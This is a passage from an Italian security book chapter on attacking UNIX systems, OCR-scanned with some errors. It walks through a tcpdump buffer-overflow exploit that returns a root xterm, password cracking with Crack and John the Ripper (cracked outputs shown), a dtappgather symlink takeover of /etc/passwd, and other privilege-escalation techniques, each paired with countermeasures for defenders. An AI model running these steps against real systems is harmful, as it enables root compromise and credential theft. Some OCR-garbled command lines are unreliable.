L'attacco a un programma di sniffing che viene eseguito in modalità promiscua è un 
argomento interessante, in quanto il sistema target non richiede di avere nessuna por- 
ta in ascolto. Avete capito bene: è possibile attaccare un sistema UNIX eseguito in 
modalità promiscua, sfruttando le condizioni di vulnerabilità (per esempio, quelle di 
buffer overflow) presenti nel programma di sniffing stesso, anche se nel sistema sono 
disabilitati tutti i servizi TCP/UDP. Un eccellente esempio di attacco di questo tipo è la 
vulnerabilità presente in tepdump versione 3.5.2: questa particolare versione di 
tepdump è risultata soggetta a condizioni di buffer overflow nel codice di parsing AFS 
(Andrew Files System). Pertanto, un hacker avrebbe potuto inviare un pacchetto che 
una volta decodificato da tepdump avrebbe eseguito qualsiasi comando con le cre- 
denziali di root. Un attacco di questo tipo è stato pubblicato dal gruppo di ricerca The 
Hispahack Research Team (http://hispahack.ccc.de). Esaminiamo l’attacco. 

In primo luogo, tepdump deve essere eseguito con l'opzione -s, che consente di 
specificare il numero di byte di ogni pacchetto da catturare, Nel nostro caso, utiliz- 
zeremo 500, che è un numero sufficiente per ricreare la condizione di buffer over- 
flow nella routing di parsing AFS. 


[wave]# tcpdump -s 500 


È importante citare che se tcpdump è eseguito senza questa particolare opzione, il va- 
lore predefinito dei pacchetti è di 68 byte, che non è sufficiente per sfruttare questa 
condizione particolare di vulnerabilità. Ora lanceremo il vero e proprio attacco. Speci- 
fichiamo l'indirizzo IP del nostro obiettivo (192.168.1.200) eseguendo la versione di 
tepdump vulnerabile: il codice di questa versione particolare prevede di restituire un 
xterm, cosicché specificheremo l’indirizzo IP del sistema attaccante, ossia 192.168.1.50. 
Infine, dobbiamo fornire un valore di offset di memoria per la condizione di buffer 
overflow, nel nostro caso 100 (questo valore potrebbe variare in altri sistemi). 


[tsunami]# tcpdump-xploit 192.168.1.200 192.168.1.50 100 


A questo punto, saremo magicamente gratificati da un xterm che dispone dei diritti 
di root. Ovviamente, se questo fosse un sistema di gestione di rete o se avesse un 
IDS che utilizza tcpdump, gli effetti potrebbero essere devastanti. 
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Contromisure agli attacchi in modalità promiscua 


Per questa condizione di vulnerabilità particolare, gli utenti della versione 3.5.2 di 
tepdump dovrebbero effettuare l'upgrade alla versione 3.6.1 o superiore (http: // 
www.tcpdump.org/). Nei sistemi che si occupano semplicemente di catturare il 
traffico di rete o di eseguire funzioni di rilevamento delle intrusioni, considerate la 
possibilità di porre la scheda di rete dedicata alla cattura del traffico ostile in “mo- 
dalità nascosta”: si considera in tale modalità un sistema la cui scheda di rete è 
promiscua pur non disponendo di un vero indirizzo IP. Molto spesso, i sistemi na- 
scosti hanno una scheda di interfaccia di rete secondaria inserita in un diverso 
segmento, che ha un indirizzo IP utilizzato per le funzioni di gestione. Per esem- 
pio, per far sì che Solaris sia posto in modalità nascosta, occorre eseguire il co- 
mando seguente: 


[quake]# /usr/sbin/ifconfig nf@ plumb -arp up 


Il fatto di configurare l’interfaccia in modalità promiscua senza un indirizzo IP inibi- 
sce il sistema dal comunicare via IP con un hacker ostile. Nel nostro esempio, un 
hacker non avrebbe mai potuto ricevere un xterm da 192.168.1.200 poiché il siste- 
ma non sarebbe stato in grado di comunicare con 192.168.1.50. 


Accesso locale 


Fino a ora abbiamo trattato le tecniche più comuni per attaccare i sistemi UNIX da 
una postazione remota. Come abbiamo già detto, la maggior parte degli hacker 
tenta di ottenere l’accesso locale attraverso qualche punto vulnerabile che può es- 
sere sfruttato da una postazione remota, Nel momento in cui un hacker ottiene 
l’accesso a una shell di comando, viene automaticamente considerato locale per il 
sistema. Anche se è possibile ottenere l’accesso come utente root sfruttando un 
punto vulnerabile da una postazione remota, in genere un hacker tenta prima di 
ottenere l’accesso locale. Successivamente, mette in pratica le tecniche per proce- 
dere alla scalata all'utente root (privilege escalation, scalata ai diritti di accesso), il 
grado di difficoltà della quale dipende in gran parte dalla versione e dal tipo di si- 
stema operativo, nonché dalla configurazione specifica del sistema attaccato. Al- 
cuni sistemi operativi svolgono un lavoro superlativo per impedire agli utenti l’ac- 
cesso alle risorse di root, mentre altri si autoproteggono in modo assolutamente 
non efficace. Un’installazione standard di OpenBSD è molto più difficile da pene- 
trare di un equivalente sistema in cui sia attivo Irix. Ovviamente le configurazioni 
personalizzate di ciascun sistema hanno un notevole impatto sulla sicurezza gene- 
rale del sistema. Il paragrafo seguente prende in esame le tecniche per effettuare 
la scalata ai privilegi dell'utente root. Nella maggior parte dei casi l'utente root è 
l'oggetto del desiderio, anche se a volte non è sempre indispensabile: se l’hacker 
è interessato esclusivamente a penetrare in un database Oracle, per esempio, 
l’unico utente necessario è l'ID Oracle. 
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1®, Vulnerabilità dovute alla scelta delle password 


Diffusione: 10 
Semplicità: 9 
Impatto: Ss 
Fattore di rischio: 9 


Basandoci sull'analisi degli attacchi a forza bruta, già visti precedentemente, è ormai 
evidente il rischio di selezionare password a basso profilo di sicurezza. Non ha al- 
cuna importanza se l’hacker cerca di eseguire l’attacco da remoto o in locale, poi- 
ché in ogni caso una password debole mette a rischio la sicurezza del sistema. Dal 
momento che abbiamo già parlato ampiamente dei rischi principali, passiamo diret- 
tamente ai metodi utilizzabili per il crack delle password. 

Il crack delle password è anche indicato come attacco automatizzato sferrato sulla 
base di un dizionario di parole. Se l'attacco a forza bruta può essere descritto come 
un attacco attivo, il crack delle password può essere svolto non in linea, in modo 
“passivo”. Questo è un tipo comune di attacco locale, perché l’hacker deve ottenere 
il file /ete/passwd, oppure un file shadow, dei quali è possibile intercettare una co- 
pia da remoto (per esempio via TFTP o HTTP). Pensiamo comunque che sia più ap- 
propriato descrivere il crack delle password tra i metodi di attacco locali. Il crack è 
differente dall’attacco a forza bruta, perché non tenta di accedere a servizi o di ese- 
guire il comando su, Il meccanismo del crack consiste nel cifrare una probabile 
pass-word per un dato nome utente e confrontare il risultato della cifratura con 
l'hash ottenuto dal file /etc/passwd o da un file shadow. 

Se l'hash generato dal programma di crack è identico a quello ottenuto dal sistema, 
la password è stata indovinata con successo. Il processo descritto è algebra elemen- 
tare. Se conosciamo due dei tre elementi necessari, possiamo cercare di dedurre il 
terzo. I tentativi vengono effettuati con un dizionario di parole o con testo a caso: 
chiameremo input queste parole. Conoscendo l’algoritmo di hash (che di solito è 
DES, Data Encryption Standard), lo applichiamo all’input e confrontiamo l’output 
ottenuto con l’hash vero del nome utente: se i due corrispondono, conosciamo la 
password originale. Questo processo è illustrato nella Figura 7.4. 

Due dei migliori programmi disponibili per eseguire il crack delle password 
sono Crack 5.0a scritto da Alec Muffett, e John the Ripper (John lo squartatore) 
di Solar Designer. Crack 5.0a, in breve “Crack”, è sicuramente il programma per 
eseguire il crack più noto e dalla sua introduzione si è costantemente evoluto. 
Viene consegnato con un esteso vocabolario di parole che spazia dai termini in- 
glesi più banali, fino alla terminologia di Star Trek. Crack fornisce anche un 
meccanismo che consente di distribuire l’elaborazione su diversi computer. 
John the Ripper, più brevemente “John”, è più recente di Crack 5.0a e può esse- 
re ottimizzato in maniera molto sofisticata per eseguire tentativi di crack di mol- 
tissime password in tempi molto brevi: inoltre, è in grado di gestire diversi algo- 
ritmi di hash in più rispetto a Crack. Sia Crack sia John consentono di elaborare 
diverse permutazioni partendo da ciascuna parola presente nel vocabolario for- 
nito. Entrambi i programmi dispongono di circa 2400 regole predefinite, che 
possono essere applicate al dizionario per poter rintracciare parole che sembre- 
rebbe impossibile riuscire a indovinare. Questi programmi vengono forniti di 
documentazione completa che consigliamo di prendere in esame. Invece di 
esporre tutte le loro caratteristiche, presenteremo un esempio reale di utilizzo di 
Crack e analizzeremo l'output prodotto. È importante avere ben chiara la strut- 
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Processo di crack Password 
cifrata sconosciuta 3. Il risultato 


WmZw3gFv948ak viene 
confrontato 


con la password 
cifrata fino a che 
non si trova il 


1. Parole scelte corrispondente 
a caso vengono 


estratte da un 
dizionario 


applaud > —» hKIAp62xG44 
applause +» Cifratura  —» 7qdR39bEv 
apple —» —» WmZw3gFv948ak 


2. La parola 
viene cifrata 


Dizionario 
di parole 


Figura 7.4 
Cracking delle password. 


tura del file /etc/passwd; quindi, se avete necessità di un ripasso, consultate un 
qualsiasi testo relativo a UNIX. 


Crack 5.0a 


Avviare Crack per l’elaborazione di un file di password è facilissimo: è sufficiente 
passargli un file di password e attendere il risultato. Crack si compila da solo quan- 
do viene eseguito, digitando il comando make per preparare i componenti necessari 
all'elaborazione. Uno dei punti di forza di Crack è l'incredibile numero di regole di 
permutazione delle parole base disponibile, Inoltre, ogni volta che viene avviato, 
viene costituito un vocabolario personalizzato, costruito prendendo tutti gli ID 
utente presenti e ogni parola fornita nel campo GECOS (il campo di commento del 
file passwd). Non sottovalutate l’importanza di questo campo: moltissimi utenti vi 
inseriscono il loro nome completo e utilizzano come password una variazione sul 
nome. Crack individua rapidamente queste password. Diamo un'occhiata a un file 
password poco sicuro e iniziamo il processo di crack: 


root:cwIBREDaWLHmo:0:0:root:/root:/bin/bash 
bin:*:1:1:bin:/bin: 
daemon:*:2:2:daemon:/sbin: 
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<other locked accounts omitted> 

nobody:*:99:99:Nobody:/: 
eric:GmTFg0AavFAQU:500:0::/home/eric:/bin/csh 
samantha:XaDeasK8g8g93s:501:503::/home/samantha:/bin/bash 
temp:kRWegGS5iTZP50:502:506::/home/temp:/bin/bash 
hackme:nh.StBNcQnyE2:504:1::/home/hackme:/bin/bash 
bob:9wynbWzXinBQ6:506:1::/home/bob:/bin/csh 
es:@0xUH89TiymLcc:501:501::/home/es:/bin/bash 
mother:jxZditcz3wW20:505:505::/home/mother:/bin/bash 
jfr:kyzKROryhFDE2:506:506::/home/jfr:/bin/bash 


Per eseguire Crack si utilizza il comando seguente: 


[tsunami]# Crack passwd 

Crack 5.0a: The Password Cracker. 

(c) Alec Muffett, 1991, 1992, 1993, 1994, 1995, 1996 

System: Linux 2.90.36 #1 Tue Oct 13 22:17:11 EDT 1998 i686 unknown 
<omitted for brevity> 


Crack: The dictionaries seem up to date... 

Crack: Sorting out and merging feedback, please be patient... 
Crack: Merging password files... 

Crack: Creating gecos-derived dictionaries 

mkgecosd: making non-permuted words dictionary 

mkgecosd: making permuted words dictionary 

Crack: launching: cracker -kill run/system.11324 


Done 


Crack a questo punto è in esecuzione in background e salva l'output in un databa- 
se, per consultare il quale e controllare se qualche password è stata scoperta dob- 
biamo avviare Reporter: 


[tsunami]# Reporter -quiet 
---- passwords cracked as of Sat 13:09:50 EDT --.-- 


Guessed eric [jenny] [passwd /bin/csh] 
Guessed hackme [hackme] [passwd /bin/bash] 
Guessed temp [temp] [passwd /bin/bash] 
Guessed es [eses] [passwd /bin/bash] 
Guessed jfr [solaris1] [passwd /bin/bash] 


Utilizzando l'opzione -quiet abbiamo visualizzato le password scoperte finora. Se 
eseguiamo Reporter senza specificare opzioni, vengono visualizzati errori, warning 
e password bloccate. Insieme a Crack vengono forniti diversi script molto utili: tra 
essi possiamo trovare shadmrg.sv, che è impiegato per unire il file password di 
UNIX al file shadow. In questo modo vengono combinate in un unico file tutte le 
informazioni necessarie al crack. ‘Tra gli altri comandi interessanti c'è make tidy, 
che viene utilizzato per rimuovere gli utenti rimasti dopo aver eseguito Crack. 

Infine dobbiamo spiegare come individuare l'algoritmo che viene utilizzato per crea- 
re gli hash delle password. Nel nostro esempio viene utilizzato DES, che è l’algorit- 
mo standard per molte distribuzioni di UNIX. Per avere maggiore sicurezza, alcuni 
sistemi consentono di utilizzare MD5 o blowfish, due tipi di algoritmi di cifratura 
molto potenti. L'hash di una password creato con MD5 è decisamente più lungo di 
un corrispondente hash DES, e inizia sempre con i caratteri “$1”, Invece, un hash 
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blowfish inizia sempre con i caratteri “$2”. Se dovete eseguire il crack di password 
cifrate con MD5 o blowfish, vi consigliamo vivamente di utilizzare John the Ripper. 


John the Ripper 


John the Ripper di Solar Designer è uno dei migliori programmi di utilità per il crack 
delle password tra quelle disponibili. È disponibile all'indirizzo http://www. 
openwall.com/john/. Qui troverete la versione di John per piattaforme UNIX e NT, 
il che è un vantaggio per utenti Windows. Come abbiamo già detto, John è uno dei 
programmi per il crack delle password più veloci attualmente disponibili, ed è 
estremamente semplice da eseguire: 


[shadow]# john passwd 
Loaded 9 passwords with 9 different salts (Standard DES [24/32 4K]) 
hackme (hackme) 


temp (temp) 
eses (es) 
jenny (eric) 
t78 (bob) 


guesses: 5 time: 0:00:04:26 (3) c/s: 16278 trying: pireth - StUACT 


Eseguiamo il comando john passando come argomento il file passwd desiderato e 
il gioco è fatto: il programma è in grado di identificare l'algoritmo di cifratura asso- 
ciato, DES nel nostro caso, e iniziare la procedura di ricerca delle password. Inizial- 
mente utilizza un dizionario dei termini, password.1st, per poi passare all’attacco 
per forza bruta. Come potete vedere, la versione di “serie” di John è stata in grado 
di identificare l'utente bob, mentre Crack aveva identificato l'utente jfr. Ogni pro- 
gramma fornisce risultati differenti. Questo è dovuto principalmente alle dimensioni 
ridotte del file delle parole fornito con john; pertanto vi consigliamo di utilizzare un 
dizionario dei termini più esteso controllato dal file john. ini. Sono disponibili del- 
le raccolte di liste di password complete all'indirizzo http://packetstormsecuri - 
ty.org/Crackers/wordlists/. 


© Contromisure per la scelta delle password 


Fate riferimento al paragrafo “Contromisure agli attacchi a forza bruta” in questo 
stesso capitolo. 


E) Buffer overflow locale 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 10 


Gli attacchi locali di buffer overflow sono estremamente diffusi. Come abbiamo già 
evidenziato nel paragrafo “Attacchi remoti”, le condizioni di buffer overflow con- 
sentono all’hacker di eseguire comandi o programmi sul server target a sua discre- 
zione. Molto spesso i buffer overflow vengono utilizzati per eseguire l'attacco di file 
SUID root, consentendo così di eseguire comandi con i privilegi di root. Abbiamo 
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già visto in che modo rendono possibile l'esecuzione di codice e comandi. In que- 
sto paragrafo analizzeremo invece esempi di buffer overflow locali. 

Nel maggio 1999, Shadow Penguin Security ha emesso una informativa relativa alla 
presenza di una condizione di buffer overflow nella libreria libc che riguarda la va- 
riabile di ambiente LC_MESSAGFS. Ogni programma SUID che è collegato dinami- 
camente a libc e utilizza la variabile di ambiente LC_MESSAGES può essere soggetto 
a questo attacco, che espone quindi moltissimi programmi, dato che la condizione 
è stata riscontrata in una libreria di sistema (libc) e non in un programma specifico. 
Questo è molto importante ed è il motivo per cui abbiamo scelto questo esempio. 
Una condizione di buffer overflow può interessare molti programmi differenti, se 
viene rilevata in libc. Vediamo come viene sfruttato questo punto debole. 
Innanzitutto dobbiamo compilare l’effettivo programma di attacco. I risultati ottenu- 
ti potrebbero differire notevolmente, in quanto il codice è molto complesso. Il lavo- 
ro da svolgere potrebbe essere anche impegnativo, perché spesso dovrete ritoccare 
il codice sorgente per poterlo compilare, dal momento che il programma è dipen- 
dente dalla piattaforma utilizzata. Questo attacco particolare è scritto per Solaris 2.6 
e 2.7. Per compilare il codice abbiamo utilizzato gcc, il compilatore GNU, visto che 
Solaris non viene di solito distribuito con un proprio compilatore. Il codice sorgente 
è segnalato da *.c. Il programma sorgente è ex_lobc.c. L'eseguibile generato è 
ex_lobc: 


[quake]$ gcc ex_lobc.c -0 ex_lobc 


Di seguito eseguiamo ex_lobc, che genera la condizione di overflow in libc attra- 
verso un programma SUID come per esempio /bin/passwd: 


[quake]$ ./ex_lobc 
jumping address : efffe7a8 
# 


L'attacco passa a uno specifico indirizzo di memoria e avvia /bin/sh con i privilegi 
di root: il risultato è l’inconfondibile cancelletto #, che indica che abbiamo ottenuto 
l'accesso come root. Questo esercizio è molto semplice e potrebbe farci apparire 
come grandissimi esperti di sicurezza. In realtà alla Shadow Penguin Security hanno 
lavorato intensamente per scoprire e sfruttare l’overflow. Come potete immaginare, 
la cosa maggiormente desiderata da un hacker che accede localmente a UNIX è 
proprio la possibilità di diventare utente root. 


Contromisure ai buffer overflow locali 


Le migliori contromisure per le condizioni di buffer overflow consistono nel miglio- 
rare le tecniche di programmazione e nel disattivare l'esecuzione dello stack. Se 
l'esecuzione dello stack viene impedita, è decisamente più difficile provocare una 
condizione di buffer overflow. Per l’elenco completo dei metodi di difesa di veda il 
paragrafo “Contromisure ai buffer overflow”. Rimuovete il bit SUID da qualunque 
file non richieda assolutamente tali autorizzazioni. 
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C) Symlink 


Diffusione: # 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 9 


File spazzatura, file temporanei, area di scarto: molti sistemi sono sommersi da 
spazzatura elettronica. Per fortuna in UNIX la maggior parte dei file temporanei vie- 
ne creata nell'unica directory /tmp, che è il posto migliore per memorizzare file 
temporanei, ma spesso l'utilizzo diventa abuso. Molti programmi con SUID root 
sono scritti per creare in /tmp, o in altre directory, file temporanei di importante uti- 
lizzo senza il minimo controllo di sicurezza. Il primo problema si riferisce ai pro- 
grammi che seguono i link simbolici ad altri file fidandosi ciecamente. Un link sim- 
bolico è un meccanismo grazie al quale viene creato un file con l'utilizzo del co- 
mando ln: è un nome di file che punta a un altro file. Creiamo un link simbolico 
/tmp/foo che punta a /etc/passwd: 


[quake]$ ln -s /tmp/foo /etc/passwd 


Se eseguiamo cat sul file /tmp/foo, otteniamo il contenuto del file delle password. 
Questo comportamento lecito rappresenta però una possibilità latente di intrusione. 
Anche se molto spesso vengono sfruttati i file presenti in /tmp per tentare un'intru- 
sione, esistono applicazioni che creano file temporanei in altre posizioni. Esaminia- 
mo un esempio reale per comprendere il meccanismo di questo attacco, come 
dtappgather per ambiente Solaris. 

dtappgather è una utilità che fa parte del Common Desktop Environment. Ogni 
volta che si esegue dtappgather, viene creato il file temporaneo /var/dt/appcon- 
fig/appmanager/generic-display-0 e vengono impostate le autorizzazioni del 
file a 0666. Anche la proprietà del file è modificata, impostando l’UID dell’utente 
che ha avviato il programma, Sfortunatamente dtappgather non esegue alcun con- 
trollo per stabilire se il file esiste o se è un link simbolico. Se l’hacker crea un link 
simbolico da /var/dt/appconfig/appmanager/generic-display-0@ verso un altro 
file (per esempio, /etc/passwd), le autorizzazioni di tale file vengono portate a 
0666, e la sua proprietà passa all’utente che l’hacker sta utilizzando. Possiamo vede- 
re la situazione del file /etc/passwd prima che venga avviato il programma: la pro- 
prietà del file è root:sys: 


[quake]$ 1s -1 /etc/passwd 
-P-XP-XP-X 1 root SyS 560 May 5 22:36 /etc/passwd 


Ora creiamo un link simbolico /var/dt/appconfig/appmanager/generic-di- 
splay-@ al file /etc/passwd: 


[quake]$ ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0@ 
Per finire eseguiamo dtappgather e verifichiamo le autorizzazioni di /etc/passwd: 
[quake]$ /usr/dt/bin/dtappgather 

MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists 


[quake]$ ls -1 /etc/passwd 
-PXP-XP-X 1 gk staff 560 May 5 22:36 /etc/passwd 
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dtappgather ha seguito ciecamente il link simbolico a /etc/passwd, e ha modifica- 
to la proprietà del file. Potete anche ripetere la stessa operazione sul file /etc/sha - 
dow. Una volta che la proprietà di /etc/passwd e di /etc/shadow è passata al vo- 
stro utente, potete modificare entrambi i file e aggiungere un nuovo UID 0 (equiva- 
lente a root). Fine del gioco in meno di un minuto. 


Contromisure per i link simbolici 


La migliore difesa contro questi attacchi consiste nel migliorare i metodi di pro- 
grammazione. Per nostra sfortuna molti programmi operano senza effettuare con- 
trolli sui file esistenti. I programmatori dovrebbero verificare se il file esiste, prima 
di crearne uno, utilizzando i flag O_EXCL | O_LCREAT. Quando vengono creati file 
temporanei, impostate UMASK e utilizzate le funzioni tmpfile() o mktemp(). Se 
siete interessati a vedere un altro esempio di programma che crea file temporanei, 
eseguite il seguente comando in /bin oppure in /usr/sbin: 


[quake]$ strings * |grep tmp 


Se il programma è SUID, c’è la possibilità per un hacker di eseguire un attacco di 
tipo link simbolico. Anche in questo caso rimuovete il bit SUID da ogni possibile fi- 
le, per attenuare il rischio di vulnerabilità. 


de 


® Sfruttare gli handler dei segnali (condizioni di corsa) 


Diffusione: 8 
Semplicità: is) 
Impatto: 9 
Fattore di rischio: Pd 


In molte battaglie reali, vige la regola di avvantaggiarsi sull’avversario nel momento 
in cui questo è maggiormente in difficoltà. Questo assioma è valido anche negli as- 
salti virtuali. Gli hacker cercano di sfruttare programmi che stanno eseguendo opera- 
zioni privilegiate. Spesso questo si traduce nel rimandare un attacco in modo tale da 
poterlo sferrare subito dopo che il programma o processo è entrato in modalità pri- 
vilegiata, ma prima che questa modalità venga nuovamente disattivata. Spesso c'è 
solamente un breve intervallo temporale in cui l’hacker può mettere in pratica i suoi 
propositi. Una vulnerabilità che consente a un hacker di sfruttare questa opportunità 
è definita race condition (condizione di corsa). Se gli attaccanti arrivano a compro- 
mettere il file o il processo con successo nel corso di questa sua modalità privilegia- 
ta, questo evento è definito come “winning the race” (vincere la corsa). Esistono 
molti modi diversi per sfruttare le finestre temporali. Parleremo in particolare dei 
metodi che sfruttano la gestione dei segnali UNIX, poiché sono molto diffusi. 


Nozioni sui segnali 


I segnali sono un meccanismo di UNIX utilizzato per notificare a un processo 
che una qualche condizione è attiva, e per gestire gli eventi asincroni. Per esem- 
pio, se un utente desidera sospendere un programma attivo deve premere 
CTRL+Z: questa operazione invia il segnale SIGTSTP a tutti i processi appartenen- 
ti al gruppo in esecuzione, In questo caso i segnali sono utilizzati per modificare 
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il flusso di esecuzione di un programma. Anche questa volta deve squillare un 
campanello d'allarme, in quanto parliamo di qualcosa in grado di alterare la nor- 
male esecuzione di un programma. La possibilità di modificare le operazioni ese- 
guite dai programmi è il più importante fattore relativo alla sicurezza della ge- 
stione dei segnali. Ricordate che SIGTSTP è solamente uno dei trenta e più tipi di 
segnale disponibili. 

Un esempio di anomalia nell'utilizzo di segnali è presente in wu-ftpd v2.4: questo 
punto vulnerabile è stato scoperto nel 1996, e consentiva a utenti, anonimi e non, 
di accedere ai file come utenti root. Era provocato da un difetto nel server FTP re- 
lativo alla gestione dei segnali, che installava due handler di segnale in fase di av- 
vio. Uno dei due era utilizzato per intercettare SIGPIPE quando la connessione 
alla porta veniva chiusa, l’altro intercettava SIGURG nel momento in cui veniva uti- 
lizzato ABOR (per annullare il trasferimento di file). Di norma, quando un utente 
si collega a un server FTP, il server è attivo con l’effettivo UID dell’utente, non 
come utente root. Se la connessione dati viene chiusa in modo inaspettato, viene 
inviato il segnale SIGPIPE al server FTP, il quale esegue la funzione dologout() e 
passa ai privilegi dell'utente root (UID 0). Il server aggiunge una nuova riga al log 
di sistema, chiude il file di log xferlog, rimuove l'istanza del server di proprietà 
dell’utente dalla tabella dei processi attivi ed esce. Il momento in cui il server pas- 
sa all'UID 0 è la fase vulnerabile all’attacco. L'hacker deve inviare il segnale SI - 
GURG al server FTP mentre l’UID è 0, interrompendolo mentre tenta di scollegare 
l'utente; deve poi passare di nuovo alla funzione principale di esecuzione del ser- 
ver. Questa operazione crea una race condition nell’intervallo di tempo compreso 
tra il momento di passaggio all’UID 0 e lo scollegamento effettivo dell’utente. Se 
l'attacco ha successo (di solito dopo alcuni tentativi), l'utente è ancora connesso 
al server FTP con i privilegi di root, e l’hacker può servirsi dei comandi put e get 
per accedere a qualunque file. 


DÌ Contromisure agli attacchi agli handler dei segnali 


Quando si lavora con file SUID è assolutamente necessario attivare funzioni sicure 
di gestione dei segnali. L'utente non può agire per modificare programmi e assicu- 
rarsi che gli handler di segnale siano corretti: è un compito del programmatore. An- 
che questa volta vi rammentiamo di ridurre il numero di file SUID, se non necessari, 
e di applicare tutti gli aggiornamenti disponibili per i software in uso. 


C) Manipolazione dei file core 


Diffusione: 7 
Semplicità: 9 
Impatto: 4 
Fattore di rischio: 7 


Anche la creazione di un file core quando i programmi o i processi generano errori 
è un problema di sicurezza, oltre a essere una seccatura per l'utente. All’interno del- 
la memoria sono presenti moltissime informazioni delicate, tra cui gli hash delle 
password lette dal file passwd o da un file shadow. Prendiamo come esempio un 
punto vulnerabile che era presente nel file core relativo alle prime versioni di FTPD. 
FTPD consentiva di provocare la scrittura di un file core accessibile a chiunque, se il 
comando PASV veniva inviato prima di procedere all’autenticazione al server. Il file 


Hacking di UNIX 301 


core conteneva porzioni del file shadow, e in molti casi gli hash delle password de- 
gli utenti, la presenza dei quali consentiva di procedere con il crack delle password 
e con il successivo attacco al sistema, come abbiamo già visto. 


Contromisure all’attacco dei file core 


I file core sono mali necessari: anche se rendono disponibili informazioni riservate 
agli hacker, in realtà consentono di conservare preziose informazioni relative a pro- 
grammi e processi che si interrompono. In base alle vostre esigenze di sicurezza, è 
possibile limitare il sistema nella creazione dei file core utilizzando il comando uli- 
mit: impostandolo a 0 viene disattivata la generazione di file core. Per maggiori in- 
formazioni, consultate la pagina di manuale relativa a ulimit: 


[tsunami]$ ulimit -a 

core file size (blocks) unlimited 
[tsunami]$ ulimit -c 0 

[tsunami]$ ulimit -a 

core file size (blocks) (o) 


1) Librerie condivise 


Diffusione: 4 
Semplicità: 4 
Impatto: o) 
Fattore di rischio: 6 


Le librerie condivise consentono ai programmi eseguibili di richiamare porzioni di 
codice da una libreria comune. Questo codice viene collegato al programma duran- 
te la compilazione. Quando l'applicazione viene eseguita, questa fa riferimento a 
una libreria condivisa per poter reperire il codice necessario all'esecuzione, Il van- 
taggio maggiore di questa tecnica consiste nel risparmio di spazio su disco e in me- 
moria e nella gestione enormemente facilitata del codice della libreria. Aggiornando 
una libreria, vengono in realtà aggiornati tutti i programmi che la utilizzano. Ovvia- 
mente ci sono problemi di sicurezza: se un hacker riesce a modificare una libreria 
condivisa, o a fornire in pasto al programma una libreria differente (attraverso una 
variabile di ambiente), è in grado di impadronirsi dell’utente root in breve tempo. 
Un esempio di questo tipo di attacco è stato riscontrato in in.telnetd (documento 
CERT CA-95.14). Il problema è abbastanza vecchio ma fornisce un esempio interes- 
sante. Alcune versioni di in.telnetd rendevano possibile il passaggio di variabili di 
ambiente al sistema remoto quando l’utente tentava di stabilire una connessione 
(RFC 1408 e 1572): in questo modo l’hacker poteva impostare la variabile di am- 
biente LD_PRELOAD quando eseguiva la connessione remota via telnet, e ottene- 
re l’accesso come utente root. 

Per poter sfruttare correttamente il difetto, era necessario posizionare in qualche 
modo una versione modificata della libreria condivisa. In seguito, modificando la 
variabile di ambiente LD_PRELOAD si costringeva il sistema a utilizzare la libreria 
condivisa, opportunamente modificata. Quando in.telnetd eseguiva /bin/login 
per autenticare l’utente, il sistema caricava la libreria contraffatta e ridefiniva la chia- 
mata alla libreria originale: questo consentiva all'utente di eseguire una sessione 
come utente root. 
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Contromisure per le librerie condivise 


Il linker dinamico dovrebbe ignorare la variabile di ambiente LD_PRELOAD per i 
programmi che sono SUID root. I puristi potrebbero obiettare che le librerie condi- 
vise dovrebbero essere scritte in modo corretto, e in questo modo sarebbe anche si- 
curo specificare la variabile LD_PRELOAD. In realtà, esistono diversi problemi che 
potrebbero esporre il sistema ad attacchi, quando viene eseguito qualche program- 
ma che è SUID root. Inoltre le librerie condivise (per esempio /usr/lib o /lib) do- 
vrebbero essere protette alla stregua dei file più delicati del vostro sistema. Se un 
hacker dovesse ottenere l’accesso a /usr/lib o /lib, il sistema sarebbe spacciato. 


de 


® Difetti del kernel 


Non è un segreto che UNIX sia considerato da tutti un sistema operativo complesso 
e molto solido. Tale complessità porta inevitabilmente a difetti di programmazione. 
Nei sistemi UNIX, i difetti più nefasti sono associati al kernel stesso, che è il princi- 
pale componente del sistema operativo, responsabile della sicurezza. Questo mo- 
dello comprende il rispetto delle autorizzazioni di accesso a file e directory, la sca- 
lata e la rinuncia ai privilegi dei file SUID, la risposta del sistema ai segnali, e così 
via. Se il kernel presenta un difetto di sicurezza, tutto il sistema è in grave pericolo. 
Un esempio di difetto del kernel che colpisce milioni di sistemi è stato scoperto nel 
giugno del 2000, ed è relativo a quasi tutti i kernel Linux 2.2.x sviluppati a quella data. 
Questo punto debole è connesso alle “funzionalità POSIX” recentemente implemen- 
tate nel kernel Linux, ideate per consentire un controllo maggiore sui processi privile- 
giati. Fondamentalmente, il loro scopo è quello di migliorare la sicurezza complessiva 
del sistema. Sfortunatamente, a causa di un difetto di programmazione, questa misura 
di sicurezza non funziona nel modo desiderato. Tale difetto può essere sfruttato fa- 
cendo in modo che i programmi SUID (per esempio, sendmail) non rilascino i privi- 
legi quando dovuto: un hacker che ha conseguito l’accesso alla shell di un sistema 
vulnerabile può portare i propri diritti a livello di utente root. 


Contromisure per i difetti del kernel 


Questa vulnerabilità colpisce molti sistemi Linux ed è qualcosa che gli amministra- 
tori devono risolvere con urgenza. Fortunatamente, la soluzione è disponibile e 
semplice da implementare. Per gli utenti che dispongono della versione 2.2.x del 
kernel, è sufficiente eseguire l'aggiornamento alla versione 2.2.16 0 superiore. 


® Configurazioni non corrette del sistema 


Abbiamo tentato di analizzare tutti i metodi più comuni per fare leva sui punti vul- 
nerabili conosciuti e ottenere l’accesso al sistema. L'elenco è abbastanza completo, 
ma esistono tantissimi altri metodi che possono essere utilizzati per attaccare un si- 
stema vulnerabile. Un sistema può essere compromesso a causa di configurazioni 
non corrette o di un certo lassismo degli amministratori di sistema. Un sistema può 
essere estremamente sicuro, ma se l'amministratore di sistema modifica le autorizza- 
zioni del file /etc/passwd, consentendone la modifica a chiunque, tutti gli sforzi ai 
fini della sicurezza sono inutili. Insomma, è il fattore umano che decreta la sconfitta 
di moltissimi sistemi. 
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E) Autorizzazioni di accesso a file e directory 


Diffusione: 8 
Semplicità: 9 
Impatto: 7 
Fattore di rischio: 8 


La semplicità e potenza di UNIX deriva dal concetto di file, siano essi file eseguibili, 
file di configurazione testuali o dispositivi: tutto quanto è considerato un file è asso- 
ciato ad autorizzazioni di accesso. Se le autorizzazioni sono assegnate in modo 
sconsiderato o se l'amministratore di sistema le ritocca distrattamente, la sicurezza 
del server può essere gravemente compromessa. I due filoni principali in questo 
frangente sono i file SUID root e i file accessibili in scrittura da chiunque. Questi 
